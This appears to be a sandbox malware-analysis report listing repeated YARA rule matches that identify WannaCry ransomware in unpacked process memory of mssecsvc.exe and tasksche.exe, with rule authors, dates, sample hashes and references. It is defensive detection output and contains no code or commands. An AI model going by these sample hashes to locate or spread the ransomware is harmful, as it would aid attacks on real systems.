                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
